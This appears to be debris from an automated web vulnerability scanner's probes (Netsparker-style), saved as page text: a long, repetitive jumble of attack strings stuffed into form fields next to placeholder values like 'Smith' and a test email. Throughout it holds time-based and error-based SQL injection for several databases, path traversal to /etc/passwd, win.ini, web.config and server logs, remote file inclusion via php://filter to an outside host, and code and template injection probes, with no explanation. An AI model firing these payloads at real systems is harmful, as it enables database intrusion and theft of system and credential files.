(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
+response.write(268409241-22)' 3 netsparker@example.com
Smith 3 %27
/../../../../../../../../../../proc/self/fd/2.cgi
r87.com/n
Smith (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) netsparker@example.com
"+response.write(268409241-22)+"
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
/../../../../../../../../../../proc/self/fd/2.cgi 3 netsparker@example.com
'"-->
r87.com/n 3 netsparker@example.com
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
"+response.write(268409241-22)+" 3 netsparker@example.com
Smith 3 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
/../../../../../../../../../../etc/httpd/logs/error.log
hTTp://r87.com/n
Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' netsparker@example.com
<% response.write(268409241-22) %>
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
/../../../../../../../../../../etc/httpd/logs/error.log 3 netsparker@example.com
Smith hTTp://r87.com/n netsparker@example.com
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
<% response.write(268409241-22) %> 3 netsparker@example.com
Smith 3 '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
http://r87.com/n?.cgi
/../../../../../../../../../../etc/httpd/logs/error_log
Smith 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 netsparker@example.com
print(int)0xFFF9999-22
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
/../../../../../../../../../../etc/httpd/logs/error_log 3 netsparker@example.com
Smith http://r87.com/n?.cgi netsparker@example.com
';SELECT pg_sleep(25)--
print(int)0xFFF9999-22 3 netsparker@example.com
Smith 3 convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
/../../../../../../../../../../var/log/apache2/error.log
http://r87.com/n?.cgi
Smith ';SELECT pg_sleep(25)-- netsparker@example.com
+print(int)0xFFF9999-22;//
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
/../../../../../../../../../../var/log/apache2/error.log 3 netsparker@example.com
Smith http://r87.com/n?.cgi netsparker@example.com
1;SELECT pg_sleep(25)--
+print(int)0xFFF9999-22;// 3 netsparker@example.com
Smith 3 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
/../../../../../../../../../../var/log/apache/error.log
php://filter//resource=http://r87.com/n?.cgi
Smith 1;SELECT pg_sleep(25)-- netsparker@example.com
'+print(int)0xFFF9999-22+'
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
Smith php://filter//resource=http://r87.com/n?.cgi netsparker@example.com
SELECT pg_sleep(25)--
'+print(int)0xFFF9999-22+' 3 netsparker@example.com
Smith 3 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
/../../../../../../../../../../var/log/apache/error.log 3 netsparker@example.com
r87.com/n
Smith SELECT pg_sleep(25)-- netsparker@example.com
"+print(int)0xFFF9999-22+"
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Smith r87.com/n netsparker@example.com
/../../../../../../../../../../proc/version
1);SELECT pg_sleep(25)--
"+print(int)0xFFF9999-22+" 3 netsparker@example.com
Smith 3 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
hTTp://r87.com/n
/../../../../../../../../../../proc/version 3 netsparker@example.com
Smith 1);SELECT pg_sleep(25)-- netsparker@example.com
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith 3 hTTp://r87.com/n
/../../../../../../../../../../proc/version.cgi
');SELECT pg_sleep(25)--
3 netsparker@example.com
Smith 3 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
http://r87.com/n?.cgi
/../../../../../../../../../../proc/version.cgi 3 netsparker@example.com
Smith ');SELECT pg_sleep(25)-- netsparker@example.com
{php}print(int)0xFFF9999-22;{/php}
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
Smith 3 http://r87.com/n?.cgi
/../../../../../../../../../../../etc/passwd
'));SELECT pg_sleep(25)--
{php}print(int)0xFFF9999-22;{/php} 3 netsparker@example.com
Smith 3 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
http://r87.com/n?.cgi
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
Smith '));SELECT pg_sleep(25)-- netsparker@example.com
'{${print(int)0xFFF9999-22}}'
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
Smith 3 http://r87.com/n?.cgi
file:///etc/passwd
1));SELECT pg_sleep(25)--
'{${print(int)0xFFF9999-22}}' 3 netsparker@example.com
Smith 3 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
php://filter//resource=http://r87.com/n?.cgi
file:///etc/passwd 3 netsparker@example.com
Smith 1));SELECT pg_sleep(25)-- netsparker@example.com
[php]print(int)0xFFF9999-22;[/php]
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
Smith 3 php://filter//resource=http://r87.com/n?.cgi
/../../../../../../../../../../../etc/passwd
[php]print(int)0xFFF9999-22;[/php] 3 netsparker@example.com
((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith 3 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
r87.com/n
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
print localtime()*0+0xFFF9999-22
Smith ((SELECT 1 FROM (SELECT SLEEP(25))A)) netsparker@example.com
Smith 3 '"-->
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
Smith 3 r87.com/n
/../../../../../../../../../../../etc/passwd.cgi
print localtime()*0+0xFFF9999-22 3 netsparker@example.com
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith 3 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
/../../../../../../../../../../../etc/passwd.cgi 3 netsparker@example.com
Smith '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' netsparker@example.com
eval('print localtime()*0+0xFFF9999-22')
Smith 3 netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
eval('print localtime()*0+0xFFF9999-22') 3 netsparker@example.com
ns:netsparker056650=vuln
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 3 netsparker@example.com
'+print localtime()*0+0xFFF9999-22+'
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
Smith -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' netsparker@example.com
ns:netsparker056650=vuln 3 netsparker@example.com
ns../../../../../../../../../../boot.ini........................................................................................................................................................
'+print localtime()*0+0xFFF9999-22+' 3 netsparker@example.com
Smith 3 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
http://example.com/? ns: netsparker056650=vuln
ns../../../../../../../../../../boot.ini........................................................................................................................................................ 3 netsparker@example.com
"+print localtime()*0+0xFFF9999-22+"
NSFTW
Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) netsparker@example.com
http://example.com/? ns: netsparker056650=vuln 3 netsparker@example.com
"+print localtime()*0+0xFFF9999-22+" 3 netsparker@example.com
/../../../../../../../../../../../etc/passwd
Smith 3 NSFTW
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
ns:netsparker056650=vuln
response.write(268409241-22)'
'+NSFTW+'
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
Smith -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" netsparker@example.com
ns:netsparker056650=vuln 3 netsparker@example.com
Smith response.write(268409241-22)' netsparker@example.com
Smith 3 '+NSFTW+'
ns:netsparker056650=vuln
' WAITFOR DELAY '0:0:25'--
/etc/passwd
+response.write(268409241-22)'
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
ns:netsparker056650=vuln 3 netsparker@example.com
Smith 3 ' WAITFOR DELAY '0:0:25'--
/etc/passwd 3 netsparker@example.com
Smith +response.write(268409241-22)' netsparker@example.com
Smith 3 (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
ns:netsparker056650=vuln
1 WAITFOR DELAY '0:0:25'--
reg.cgi
"+response.write(268409241-22)+"
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith ns:netsparker056650=vuln netsparker@example.com
Smith 3 1 WAITFOR DELAY '0:0:25'--
reg.cgi 3 netsparker@example.com
Smith "+response.write(268409241-22)+" netsparker@example.com
Smith 3 -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
http://example.com/? ns: netsparker056650=vuln
WAITFOR DELAY '0:0:25'--
reg.cgi
<% response.write(268409241-22) %>
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
Smith http://example.com/? ns: netsparker056650=vuln netsparker@example.com
Smith 3 WAITFOR DELAY '0:0:25'--
reg.cgi 3 netsparker@example.com
Smith <% response.write(268409241-22) %> netsparker@example.com
Smith 3 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
ns:netsparker056650=vuln
1) WAITFOR DELAY '0:0:25'--
data:;base64,TlM3NzU0NTYxNDQ2NTc1
print(int)0xFFF9999-22
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
Smith ns:netsparker056650=vuln netsparker@example.com
Smith 3 1) WAITFOR DELAY '0:0:25'--
data:;base64,TlM3NzU0NTYxNDQ2NTc1 3 netsparker@example.com
Smith print(int)0xFFF9999-22 netsparker@example.com
Smith 3 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
ns:netsparker056650=vuln
') WAITFOR DELAY '0:0:25'--
/Events/DiVA-July2004/reg.cgi
+print(int)0xFFF9999-22;//
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
Smith ns:netsparker056650=vuln netsparker@example.com
Smith 3 ') WAITFOR DELAY '0:0:25'--
/Events/DiVA-July2004/reg.cgi 3 netsparker@example.com
Smith +print(int)0xFFF9999-22;// netsparker@example.com
Smith 3 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
ns:netsparker056650=vuln
')) WAITFOR DELAY '0:0:25'--
/DiVA-July2004/reg.cgi
'+print(int)0xFFF9999-22+'
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
Smith 3 ns:netsparker056650=vuln
Smith 3 ')) WAITFOR DELAY '0:0:25'--
/DiVA-July2004/reg.cgi 3 netsparker@example.com
Smith 3 netsparker@example.com
Smith '+print(int)0xFFF9999-22+' netsparker@example.com
Smith 3 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
http://example.com/? ns: netsparker056650=vuln
1)) WAITFOR DELAY '0:0:25'--
file%3a%2fboot.ini
"+print(int)0xFFF9999-22+"
file%3a%2fboot.ini 3 netsparker@example.com
Smith 3 http://example.com/? ns: netsparker056650=vuln
Smith 3 1)) WAITFOR DELAY '0:0:25'--
Smith "+print(int)0xFFF9999-22+" netsparker@example.com
http://r87.com/?
Smith 3 netsparker@example.com
c%3a%5cboot.ini
ns:netsparker056650=vuln
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
http://r87.com/? 3 netsparker@example.com
c%3a%5cboot.ini 3 netsparker@example.com
Smith 3 ns:netsparker056650=vuln
Smith 3 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith netsparker@example.com
//r87.com/?
Smith 3 netsparker@example.com
/../../../../../../../../../../boot.ini
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
{php}print(int)0xFFF9999-22;{/php}
ns:netsparker056650=vuln
//r87.com/? 3 netsparker@example.com
Smith /../../../../../../../../../../boot.ini netsparker@example.com
Smith {php}print(int)0xFFF9999-22;{/php} netsparker@example.com
Smith 3 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
http://r87.com/?
Smith 3 ns:netsparker056650=vuln
Smith 3 netsparker@example.com
/../../../../../../../../../../web.config
'{${print(int)0xFFF9999-22}}'
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
${28275*28275-(13)}
Smith /../../../../../../../../../../web.config netsparker@example.com
Smith 3 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith '{${print(int)0xFFF9999-22}}' netsparker@example.com
Smith 3 netsparker@example.com
${28275*28275-(13)} 3 netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
[php]print(int)0xFFF9999-22;[/php]
#{28275*28275-(13)}
Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini netsparker@example.com
Smith 3 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith [php]print(int)0xFFF9999-22;[/php] netsparker@example.com
Smith 3 netsparker@example.com
#{28275*28275-(13)} 3 netsparker@example.com
/../../../../../../../../../../boot.ini.cgi
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
print localtime()*0+0xFFF9999-22
${28275*28275-(13)}
Smith /../../../../../../../../../../boot.ini.cgi netsparker@example.com
Smith 3 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
Smith print localtime()*0+0xFFF9999-22 netsparker@example.com
Smith 3 netsparker@example.com
Smith ${28275*28275-(13)} netsparker@example.com
/../../../../../../../../../../boot.ini
((select sleep(25)))a-- 1
eval('print localtime()*0+0xFFF9999-22')
#{28275*28275-(13)}
Smith /../../../../../../../../../../boot.ini netsparker@example.com
Smith 3 ((select sleep(25)))a-- 1
Smith eval('print localtime()*0+0xFFF9999-22') netsparker@example.com
Smith 3 netsparker@example.com
Smith #{28275*28275-(13)} netsparker@example.com
file:/windows/win.ini
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
'+print localtime()*0+0xFFF9999-22+'
${28275*28275-(13)}
Smith file:/windows/win.ini netsparker@example.com
Smith 3 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
Smith '+print localtime()*0+0xFFF9999-22+' netsparker@example.com
Smith 3 ${28275*28275-(13)}
file:/boot.ini
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
3 netsparker@example.com
"+print localtime()*0+0xFFF9999-22+"
#{28275*28275-(13)}
Smith file:/boot.ini netsparker@example.com
Smith 3 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
Smith "+print localtime()*0+0xFFF9999-22+" netsparker@example.com
Smith 3 #{28275*28275-(13)}
/../../../../../../../../../../windows/win.ini
Smith netsparker@example.com
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
response.write(268409241-22)'
Smith /../../../../../../../../../../windows/win.ini netsparker@example.com
Smith 3 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
Smith 3 response.write(268409241-22)'
/../../../../../../../../../../windows/win.ini.cgi
Smith 3
';SELECT pg_sleep(25)--
+response.write(268409241-22)'
Smith /../../../../../../../../../../windows/win.ini.cgi netsparker@example.com
Smith 3 ';SELECT pg_sleep(25)--
Smith 3 +response.write(268409241-22)'
c:\windows\win.ini
1;SELECT pg_sleep(25)--
"+response.write(268409241-22)+"
Smith 3 1;SELECT pg_sleep(25)--
Smith c:\windows\win.ini netsparker@example.com
Smith 3 "+response.write(268409241-22)+"
SELECT pg_sleep(25)--
c:\boot.ini
<% response.write(268409241-22) %>
http://r87.com/? 3 netsparker@example.com
Smith 3 SELECT pg_sleep(25)--
Smith c:\boot.ini netsparker@example.com
Smith 3 <% response.write(268409241-22) %>
1);SELECT pg_sleep(25)--
/../../../../../../../../../../windows/iis6.log
print(int)0xFFF9999-22
Smith 3 1);SELECT pg_sleep(25)--
Smith /../../../../../../../../../../windows/iis6.log netsparker@example.com
');SELECT pg_sleep(25)--
Smith 3 print(int)0xFFF9999-22
/../../../../../../../../../../proc/self/fd/2
Smith 3 ');SELECT pg_sleep(25)--
+print(int)0xFFF9999-22;//
Smith /../../../../../../../../../../proc/self/fd/2 netsparker@example.com
'));SELECT pg_sleep(25)--
Smith 3 +print(int)0xFFF9999-22;//
/../../../../../../../../../../proc/self/fd/2.cgi
Smith 3 '));SELECT pg_sleep(25)--
'+print(int)0xFFF9999-22+'
Smith /../../../../../../../../../../proc/self/fd/2.cgi netsparker@example.com
Smith 3 '+print(int)0xFFF9999-22+'
1));SELECT pg_sleep(25)--
/../../../../../../../../../../etc/httpd/logs/error.log
"+print(int)0xFFF9999-22+"
Smith 3 1));SELECT pg_sleep(25)--
Smith /../../../../../../../../../../etc/httpd/logs/error.log netsparker@example.com
Smith 3 "+print(int)0xFFF9999-22+"
((SELECT 1 FROM (SELECT SLEEP(25))A))
/../../../../../../../../../../etc/httpd/logs/error_log
Smith 3 ((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith /../../../../../../../../../../etc/httpd/logs/error_log netsparker@example.com
Smith 3
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
/../../../../../../../../../../var/log/apache2/error.log
{php}print(int)0xFFF9999-22;{/php}
Smith 3 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith /../../../../../../../../../../var/log/apache2/error.log netsparker@example.com
Smith 3 {php}print(int)0xFFF9999-22;{/php}
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
/../../../../../../../../../../var/log/apache/error.log
'{${print(int)0xFFF9999-22}}'
Smith 3 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith /../../../../../../../../../../var/log/apache/error.log netsparker@example.com
Smith 3 '{${print(int)0xFFF9999-22}}'
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
/../../../../../../../../../../proc/version
[php]print(int)0xFFF9999-22;[/php]
Smith 3 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith /../../../../../../../../../../proc/version netsparker@example.com
Smith 3 [php]print(int)0xFFF9999-22;[/php]
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
/../../../../../../../../../../proc/version.cgi
print localtime()*0+0xFFF9999-22
Smith 3 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
Smith /../../../../../../../../../../proc/version.cgi netsparker@example.com
r87.com/?
Smith 3 print localtime()*0+0xFFF9999-22
/../../../../../../../../../../../etc/passwd
eval('print localtime()*0+0xFFF9999-22')
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
r87.com/? 3 netsparker@example.com
Smith 3 eval('print localtime()*0+0xFFF9999-22')
/\r87.com/?
'+print localtime()*0+0xFFF9999-22+'
file:///etc/passwd
/\r87.com/? 3 netsparker@example.com
Smith 3 '+print localtime()*0+0xFFF9999-22+'
///r87.com/?
Smith file:///etc/passwd netsparker@example.com
"+print localtime()*0+0xFFF9999-22+"
/../../../../../../../../../../../etc/passwd
///r87.com/? 3 netsparker@example.com
Smith 3 "+print localtime()*0+0xFFF9999-22+"
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
/../../../../../../../../../../../etc/passwd.cgi
3 netsparker@example.com
Smith /../../../../../../../../../../../etc/passwd.cgi netsparker@example.com
http://r87.com/?
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Smith http://r87.com/? netsparker@example.com
Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd netsparker@example.com
//r87.com/?
ns../../../../../../../../../../boot.ini........................................................................................................................................................
Smith //r87.com/? netsparker@example.com
Smith ns../../../../../../../../../../boot.ini........................................................................................................................................................ netsparker@example.com
http://r87.com/?
/../../../../../../../../../../../etc/passwd
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
/etc/passwd
Smith /etc/passwd netsparker@example.com
reg.cgi
Smith reg.cgi netsparker@example.com
reg.cgi
Smith reg.cgi netsparker@example.com
data:;base64,TlM3NzU0NTYxNDQ2NTc1
Smith data:;base64,TlM3NzU0NTYxNDQ2NTc1 netsparker@example.com
/Events/DiVA-July2004/reg.cgi
Smith /Events/DiVA-July2004/reg.cgi netsparker@example.com
/DiVA-July2004/reg.cgi
Smith /DiVA-July2004/reg.cgi netsparker@example.com
file%3a%2fboot.ini
Smith file%3a%2fboot.ini netsparker@example.com
c%3a%5cboot.ini
Smith c%3a%5cboot.ini netsparker@example.com
Smith http://r87.com/? netsparker@example.com
/../../../../../../../../../../boot.ini
Smith 3 /../../../../../../../../../../boot.ini
/../../../../../../../../../../web.config
Smith 3 /../../../../../../../../../../web.config
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
Smith 3 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
/../../../../../../../../../../boot.ini.cgi
Smith 3 /../../../../../../../../../../boot.ini.cgi
/../../../../../../../../../../boot.ini
Smith 3 /../../../../../../../../../../boot.ini
file:/windows/win.ini
Smith 3 file:/windows/win.ini
file:/boot.ini
Smith 3 file:/boot.ini
/../../../../../../../../../../windows/win.ini
Smith 3 /../../../../../../../../../../windows/win.ini
/../../../../../../../../../../windows/win.ini.cgi
r87.com/?
Smith 3 /../../../../../../../../../../windows/win.ini.cgi
Smith r87.com/? netsparker@example.com
c:\windows\win.ini
Smith 3 c:\windows\win.ini
/\r87.com/?
c:\boot.ini
Smith /\r87.com/? netsparker@example.com
///r87.com/?
Smith 3 c:\boot.ini
Smith ///r87.com/? netsparker@example.com
/../../../../../../../../../../windows/iis6.log
Smith 3 /../../../../../../../../../../windows/iis6.log
Smith netsparker@example.com
/../../../../../../../../../../proc/self/fd/2
http://r87.com/?
Smith 3 /../../../../../../../../../../proc/self/fd/2
/../../../../../../../../../../proc/self/fd/2.cgi
Smith 3 http://r87.com/?
Smith 3 /../../../../../../../../../../proc/self/fd/2.cgi
//r87.com/?
/../../../../../../../../../../etc/httpd/logs/error.log
Smith 3 //r87.com/?
Smith 3 /../../../../../../../../../../etc/httpd/logs/error.log
http://r87.com/?
/../../../../../../../../../../etc/httpd/logs/error_log
Smith 3 /../../../../../../../../../../etc/httpd/logs/error_log
/../../../../../../../../../../var/log/apache2/error.log
Smith 3 /../../../../../../../../../../var/log/apache2/error.log
/../../../../../../../../../../var/log/apache/error.log
Smith 3 /../../../../../../../../../../var/log/apache/error.log
/../../../../../../../../../../proc/version
